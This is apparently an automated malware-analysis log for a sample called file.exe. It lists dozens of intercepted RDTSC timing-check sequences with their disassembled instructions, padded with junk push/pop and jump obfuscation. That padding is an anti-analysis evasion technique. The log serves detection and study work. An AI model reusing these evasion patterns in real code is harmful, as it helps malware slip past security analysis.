Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1549799 second address: 15497BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push esi 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F27A8DEEC2Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154DD17 second address: 154DD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154DD1C second address: 154DD23 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154DE94 second address: 154DE9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F27A8DB97C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154DE9E second address: 154DEBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154DFF8 second address: 154DFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154DFFC second address: 154E000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154E000 second address: 154E033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F27A8DB97D9h 0x0000000d push esi 0x0000000e jmp 00007F27A8DB97CFh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154E1D8 second address: 154E1E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F27A8DEEC26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154E1E4 second address: 154E1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154E1E8 second address: 154E1FB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F27A8DEEC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154E1FB second address: 154E1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154E1FF second address: 154E210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154E635 second address: 154E64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DB97D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154E64C second address: 154E650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 154E7C0 second address: 154E7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1551EF3 second address: 1551EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1551EF9 second address: 1551EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1551EFE second address: 1551F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F27A8DEEC35h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1551F19 second address: 1551F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1551F1D second address: 1551F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1519A0B second address: 1519A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1519A11 second address: 1519A28 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F27A8DEEC28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jne 00007F27A8DEEC26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1519A28 second address: 1519A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 mov ecx, dword ptr [ebp+122D3791h] 0x0000000d lea eax, dword ptr [ebp+1248877Bh] 0x00000013 mov dword ptr [ebp+122D355Ch], edi 0x00000019 mov cx, bx 0x0000001c push eax 0x0000001d pushad 0x0000001e pushad 0x0000001f push eax 0x00000020 pop eax 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jnp 00007F27A8DB97C6h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1519A54 second address: 1519A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1519A58 second address: 14FE3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sub edx, 57816C2Ah 0x00000010 mov dword ptr [ebp+122D3019h], edx 0x00000016 call dword ptr [ebp+122D1BD5h] 0x0000001c pushad 0x0000001d jmp 00007F27A8DB97CEh 0x00000022 jng 00007F27A8DB97CCh 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1519ED5 second address: 1519EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1519EDB second address: 1519EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151A205 second address: 151A209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151A209 second address: 151A20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151A20F second address: 151A215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151A857 second address: 151A860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151A860 second address: 151A864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151A864 second address: 151A868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14FEF24 second address: 14FEF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14FEF28 second address: 14FEF2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14FEF2C second address: 14FEF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1552903 second address: 155292E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27A8DB97D3h 0x00000009 jmp 00007F27A8DB97D4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155292E second address: 1552932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1552932 second address: 155296F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DB97D8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F27A8DB97C6h 0x00000012 jmp 00007F27A8DB97D0h 0x00000017 jg 00007F27A8DB97C6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1552C65 second address: 1552C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F27A8DEEC2Fh 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15564F6 second address: 1556501 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F27A8DB97C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155BC89 second address: 155BC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155BC8D second address: 155BC9B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155BC9B second address: 155BCC2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F27A8DEEC26h 0x00000008 jmp 00007F27A8DEEC35h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F27A8DEEC2Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155A9BD second address: 155A9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F27A8DB97C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155A9CC second address: 155A9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155A9D0 second address: 155A9F4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F27A8DB97C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F27A8DB97D5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155AB63 second address: 155AB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155AB6A second address: 155AB7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F27A8DB97C6h 0x0000000a jnp 00007F27A8DB97C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155AB7A second address: 155ABAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC2Ch 0x00000007 jmp 00007F27A8DEEC36h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F27A8DEEC2Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155AFDE second address: 155AFF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F27A8DB97C6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jnp 00007F27A8DB97C6h 0x00000011 popad 0x00000012 js 00007F27A8DB97CCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155AFF8 second address: 155B005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155A708 second address: 155A70C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155B460 second address: 155B474 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC2Ah 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155B474 second address: 155B478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155B989 second address: 155B98D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155B98D second address: 155B997 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F27A8DB97C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155B997 second address: 155B9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F27A8DEEC33h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 155B9B0 second address: 155B9C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F27A8DB97D3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1564C47 second address: 1564C51 instructions: 0x00000000 rdtsc 0x00000002 js 00007F27A8DEEC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1564C51 second address: 1564C6A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F27A8DB97D2h 0x00000008 jmp 00007F27A8DB97CCh 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1564C6A second address: 1564C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15653F5 second address: 1565405 instructions: 0x00000000 rdtsc 0x00000002 js 00007F27A8DB97C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1565405 second address: 1565409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1565409 second address: 156542E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F27A8DB97C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F27A8DB97D5h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 156542E second address: 1565452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DEEC31h 0x00000009 jg 00007F27A8DEEC26h 0x0000000f popad 0x00000010 jp 00007F27A8DEEC28h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1565596 second address: 156559A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 156559A second address: 156559E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1565736 second address: 1565746 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F27A8DB97C6h 0x00000008 jc 00007F27A8DB97C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1565746 second address: 156575B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC30h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15658C5 second address: 15658D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F27A8DB97C6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15658D6 second address: 15658DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15658DC second address: 15658FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F27A8DB97D5h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15658FC second address: 1565916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F27A8DEEC26h 0x0000000a jmp 00007F27A8DEEC30h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 156468F second address: 15646A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15646A9 second address: 15646B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F27A8DEEC26h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15646B6 second address: 15646C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1568482 second address: 1568486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 156B3BC second address: 156B3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F27A8DB97D2h 0x0000000b pushad 0x0000000c jmp 00007F27A8DB97D4h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 156B3EC second address: 156B410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jl 00007F27A8DEEC33h 0x0000000d jmp 00007F27A8DEEC2Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jnc 00007F27A8DEEC26h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 156DE17 second address: 156DE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 156DE1B second address: 156DE21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157251B second address: 1572529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jbe 00007F27A8DB97C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1572529 second address: 1572539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jp 00007F27A8DEEC26h 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1572539 second address: 157253F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1572851 second address: 1572855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15729AB second address: 15729B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15729B0 second address: 15729B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1572DF8 second address: 1572E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DB97D1h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F27A8DB97D1h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1572E24 second address: 1572E6B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F27A8DEEC38h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnp 00007F27A8DEEC3Eh 0x00000014 jmp 00007F27A8DEEC32h 0x00000019 jng 00007F27A8DEEC26h 0x0000001f push eax 0x00000020 push edx 0x00000021 jnp 00007F27A8DEEC26h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1576F05 second address: 1576F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157697C second address: 157698F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F27A8DEEC28h 0x00000008 push edx 0x00000009 jns 00007F27A8DEEC26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1576C3A second address: 1576C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1576C40 second address: 1576C59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27A8DEEC2Fh 0x00000009 jc 00007F27A8DEEC26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157B1EC second address: 157B1F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157B508 second address: 157B512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157B821 second address: 157B829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157B829 second address: 157B834 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F27A8DEEC26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157B99A second address: 157B99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
